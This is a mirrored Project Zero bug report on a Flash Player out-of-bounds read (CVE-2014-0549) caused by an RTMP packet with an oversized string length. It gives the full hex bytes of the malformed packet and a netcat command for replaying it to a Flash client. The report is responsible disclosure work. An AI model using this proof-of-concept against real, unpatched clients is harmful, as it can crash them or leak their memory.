Flash out-of-bounds read with large string length in RTMP packet

Temptationx / google-security-research

Automatically exported from code.google.com/p/google-security-research

0 stars 0 forks source link

Flash out-of-bounds read with large string length in RTMP packet #79

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago

A SWF to reproduce is attached, along with the source. The SWF simply attempts 
a connection to rtmp://localhost/

The "bad" RTMP packet is attached. To replay it, use something like this (Linux 
command line) on the localhost machine:

nc -l 1935 < badstringread.rtmp

The packet is pretty small so here it is in its entirety:

01 03 00 00 00 00 00 0E 14 00 00 00 00 01 00 0C 7F FF FF FE 41 42 43 44 45 46 47

Original issue reported on code.google.com by cev...@google.com on 28 Jul 2014 at 8:32

Attachments:

GoogleCodeExporter commented 9 years ago

Original comment by cev...@google.com on 28 Jul 2014 at 8:48

Added labels: Id-2933

GoogleCodeExporter commented 9 years ago

Original comment by cev...@google.com on 5 Sep 2014 at 10:59

Added labels: CVE-2014-0549

GoogleCodeExporter commented 9 years ago

http://helpx.adobe.com/security/products/flash-player/apsb14-21.html

Will derestrict in a week or so, etc.

Original comment by cev...@google.com on 9 Sep 2014 at 8:15

Changed state: Fixed
Added labels: Fixed-2014-Sep-9

GoogleCodeExporter commented 9 years ago

Making public.

Original comment by cev...@google.com on 23 Sep 2014 at 7:29

Removed labels: Restrict-View-Commit